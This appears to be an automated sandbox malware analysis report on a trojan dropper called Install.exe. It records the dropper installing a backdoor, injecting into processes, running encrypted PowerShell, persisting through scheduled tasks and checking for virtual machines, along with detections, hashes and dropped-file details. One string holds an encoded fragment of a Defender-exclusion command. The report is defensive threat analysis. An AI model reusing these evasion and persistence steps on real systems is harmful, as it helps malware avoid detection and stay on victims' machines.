Modify Registry		Proc Filesystem1
Application Window Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)131
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadow1
Remote System Discovery		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
Access Token Manipulation		Network Sniffing1
System Network Configuration Discovery		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron512
Process Injection		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
Hidden Files and Directories		KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 597646 Sample: Install.exe Startdate: 27/03/2022 Architecture: WINDOWS Score: 100 84 Multi AV Scanner detection for submitted file 2->84 86 .NET source code contains potential unpacker 2->86 88 .NET source code references suspicious native API functions 2->88 90 8 other signatures 2->90 10 Install.exe 9 2->10         started        13 powershell.exe 2->13         started        16 chrome.exe 2->16         started        18 powershell.exe 2->18         started        process3 file4 78 C:\...\ChiefKeefofficialnaxyi_crypted(6).exe, PE32 10->78 dropped 80 C:\Users\user\AppData\Roaming\34432.exe, PE32+ 10->80 dropped 20 34432.exe 5 10->20         started        24 ChiefKeefofficialnaxyi_crypted(6).exe 1 10->24         started        122 Creates files in the system32 config directory 13->122 124 Writes to foreign memory regions 13->124 126 Modifies the context of a thread in another process (thread injection) 13->126 128 Injects a PE file into a foreign processes 13->128 26 dllhost.exe 13->26         started        28 conhost.exe 13->28         started        130 Antivirus detection for dropped file 16->130 132 Multi AV Scanner detection for dropped file 16->132 134 Machine Learning detection for dropped file 16->134 30 cmd.exe 16->30         started        136 Found suspicious powershell code related to unpacking or dynamic code loading 18->136 32 conhost.exe 18->32         started        signatures5 process6 file7 76 C:\Users\user\AppData\Roaming\...\chrome.exe, PE32+ 20->76 dropped 102 Antivirus detection for dropped file 20->102 104 Multi AV Scanner detection for dropped file 20->104 106 Machine Learning detection for dropped file 20->106 118 2 other signatures 20->118 34 cmd.exe 20->34         started        36 cmd.exe 1 20->36         started        39 cmd.exe 20->39         started        41 nslookup.exe 20->41         started        108 Writes to foreign memory regions 24->108 110 Allocates memory in foreign processes 24->110 112 Injects a PE file into a foreign processes 24->112 43 AppLaunch.exe 15 3 24->43         started        46 conhost.exe 24->46         started        114 Creates a thread in another existing process (thread injection) 26->114 52 5 other processes 26->52 116 Encrypted powershell cmdline option found 30->116 48 powershell.exe 30->48         started        50 conhost.exe 30->50         started        signatures8 process9 dnsIp10 54 chrome.exe 34->54         started        56 conhost.exe 34->56         started        92 Encrypted powershell cmdline option found 36->92 94 Uses schtasks.exe or at.exe to add and modify task schedules 36->94 58 powershell.exe 19 36->58         started        60 powershell.exe 23 36->60         started        62 conhost.exe 36->62         started        64 conhost.exe 39->64         started        66 schtasks.exe 39->66         started        82 ip-api.com 208.95.112.1, 49735, 80 TUT-ASUS United States 43->82 96 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->96 98 Found suspicious powershell code related to unpacking or dynamic code loading 48->98 signatures11 process12 process13 68 cmd.exe 54->68         started        signatures14 100 Encrypted powershell cmdline option found 68->100 71 powershell.exe 68->71         started        74 conhost.exe 68->74         started        process15 signatures16 120 Found suspicious powershell code related to unpacking or dynamic code loading 71->120

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Install.exe41%VirustotalBrowse
Install.exe73%ReversingLabsWin32.Trojan.Zenpak

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\34432.exe100%AviraHEUR/AGEN.1221921
C:\Users\user\AppData\Roaming\Chrome\chrome.exe100%AviraHEUR/AGEN.1221921
C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\34432.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Chrome\chrome.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\34432.exe35%VirustotalBrowse
C:\Users\user\AppData\Roaming\34432.exe77%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe50%VirustotalBrowse
C:\Users\user\AppData\Roaming\Chrome\chrome.exe77%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
22.0.nslookup.exe.140000000.2.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.10.unpack100%AviraRKIT/Agent.avsktDownload File
22.0.nslookup.exe.140000000.0.unpack100%AviraTR/Injector.vwkttDownload File
22.0.nslookup.exe.140000000.8.unpack100%AviraTR/Injector.vwkttDownload File
2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack100%AviraHEUR/AGEN.1203048Download File
39.0.dllhost.exe.140000000.3.unpack100%AviraRKIT/Agent.avsktDownload File
33.2.chrome.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1221921Download File
22.0.nslookup.exe.140000000.1.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.4.unpack100%AviraRKIT/Agent.avsktDownload File
30.2.chrome.exe.20000.0.unpack100%AviraHEUR/AGEN.1221921Download File
30.0.chrome.exe.20000.0.unpack100%AviraHEUR/AGEN.1221921Download File
22.0.nslookup.exe.140000000.5.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.1.unpack100%AviraRKIT/Agent.avsktDownload File
39.0.dllhost.exe.140000000.8.unpack100%AviraRKIT/Agent.avsktDownload File
4.0.34432.exe.770000.0.unpack100%AviraHEUR/AGEN.1221921Download File
22.2.nslookup.exe.140000000.0.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.5.unpack100%AviraRKIT/Agent.avsktDownload File
33.0.chrome.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1221921Download File
5.2.AppLaunch.exe.400000.0.unpack100%AviraHEUR/AGEN.1203048Download File
4.2.34432.exe.770000.0.unpack100%AviraHEUR/AGEN.1221921Download File
39.2.dllhost.exe.140000000.0.unpack100%AviraRKIT/Agent.avsktDownload File
39.0.dllhost.exe.140000000.12.unpack100%AviraRKIT/Agent.avsktDownload File
22.0.nslookup.exe.140000000.6.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.0.unpack100%AviraRKIT/Agent.avsktDownload File
22.0.nslookup.exe.140000000.10.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.6.unpack100%AviraRKIT/Agent.avsktDownload File
22.0.nslookup.exe.140000000.12.unpack100%AviraTR/Injector.vwkttDownload File
22.0.nslookup.exe.140000000.3.unpack100%AviraTR/Injector.vwkttDownload File
22.0.nslookup.exe.140000000.4.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.2.unpack100%AviraRKIT/Agent.avsktDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://ip-api.com4Uk0%Avira URL Cloudsafe
http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM0%Avira URL Cloudsafe
http://crl.mp0%VirustotalBrowse
http://crl.mp0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ip-api.com
208.95.112.1
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://ip-api.com/line/?fields=hostingfalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://ip-api.com4UkAppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMpowershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.mppowershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://go.micropowershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://ip-api.comAppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Iconpowershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.codeplex.com/DotNetZipAppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmpfalse
                    		high
                    http://nsis.sf.net/NSIS_ErrorErrorInstall.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUSfalse

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:597646
                          Start date and time:2022-03-27 00:39:51 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 0s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:Install.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:46
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:5
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@44/26@1/1
                          EGA Information:
                          • Successful, ratio: 57.1%
                          HDC Information:
                          • Successful, ratio: 51.9% (good quality ratio 43.1%)
                          • Quality average: 58.5%
                          • Quality standard deviation: 36.7%
                          HCA Information:
                          • Successful, ratio: 71%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 52.242.101.226, 40.125.122.176, 20.54.110.249, 52.152.110.14
                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Execution Graph export aborted for target 34432.exe, PID 6836 because it is empty
                          • Execution Graph export aborted for target chrome.exe, PID 5460 because it is empty
                          • Execution Graph export aborted for target chrome.exe, PID 6564 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 6940 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7048 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          01:41:04API Interceptor123x Sleep call for process: powershell.exe modified
                          01:41:33API Interceptor2x Sleep call for process: 34432.exe modified
                          01:41:47Task SchedulerRun new task: chrome path: C:\Users\user\AppData\Roaming\Chrome\chrome.exe

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\34432.exe.log

                          Download File
                          Process:C:\Users\user\AppData\Roaming\34432.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):973
                          Entropy (8bit):5.374440234733254
                          Encrypted:false
                          SSDEEP:12:Q3La/hVAWDLI4MWuCqDLI4MWuPTxAI51KDLI4MN5P6D1BakvoDLI4MWuPak2kL0Q:MLqE4K5E4KrL1qE4GiD0E4KeGasXE4+Y
                          MD5:06639220FD6B2DCCDA25EAE889B6BCC8
                          SHA1:3EDFCBE94838702A978D3D518B2358560A296FD0
                          SHA-256:32F1B0CAE8509079F3F044C5655800CD760DB66E792B451DF2C919B6129DCB83
                          SHA-512:61EBE07C66BA18BE8838223D7946EA14DAF46CE3CEB1F27A59958857B22F00E2EF872A56D7D05C58747D57558BD07D4B097B604CA34D280B6761F3024A20A53F
                          Malicious:false
                          Reputation:unknown
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):18817
                          Entropy (8bit):5.004929862695359
                          Encrypted:false
                          SSDEEP:384:Kwib4LEVoGIpN6KQkj2jkjh4iUxLzp0ifOdBVNXp5xvOjJpYoY4Qib4w:KEEV3IpNBQkj22h4iUxLzp0ifOdBVNZY
                          MD5:DA4B150893016C59B1E5DE988406A425
                          SHA1:9CAF9C1A8F844A0FA8D88DC30F29BE7B023E7079
                          SHA-256:5107772D1007FD535B026DF52ADF8864E7C2D4C1ACAB3CD03A5C112517A426DF
                          SHA-512:533A894A8EBB39BF2D785C8E715615A994DF6D797650FCD1D7A3949C90F2682B24BFA596BD2CED15B7BA8817483E68D96D968AC64D784176D53584A116ECEDE0
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1292
                          Entropy (8bit):5.362943121948868
                          Encrypted:false
                          SSDEEP:24:3vUrcPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKuKnKJRSF8PQ9b6F:8wPerB4nqRL/Hvfe9t4Cv94aR48Y9eF
                          MD5:12513EC7250BFC953C71EA941E82B42C
                          SHA1:F821E6EF80B3144841A0385A593C2605978BAD45
                          SHA-256:91249CB24DDFEB9DC31A3EACB04449E3422C6EB754265D23C897A413EFB62592
                          SHA-512:71B09E3B079329EB741B2ACF89C28870EB225EC51DA34CDB01BE31430272892E00F134B66F6FCF1F0D5AD5368FB20554F9C512794D84BE3015388A63195403E2
                          Malicious:false
                          Reputation:unknown
                          Preview:@...e...................................R............@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bm0fgaxm.amy.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngejssxk.m2l.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy0x04mz.n4f.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm1ft0n0.g32.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u32chnre.idy.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vv5vdss4.ljn.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xll1yvfj.55e.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yezoz5fn.st5.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Users\user\AppData\Roaming\34432.exe

                          Download File
                          Process:C:\Users\user\Desktop\Install.exe
                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):2366976
                          Entropy (8bit):7.993982412207083
                          Encrypted:true
                          SSDEEP:49152:x/HcwvGPAc5un0WVlI4UY5WmWBNkheV9qeAhpC9c4E3aT:RcwePj5un1l1M/C2PsaT
                          MD5:04F6704BD3AB97905A497BAF3D7FDB3C
                          SHA1:7D216C427AF6199D119B1C5A0CC93BDB724AF669
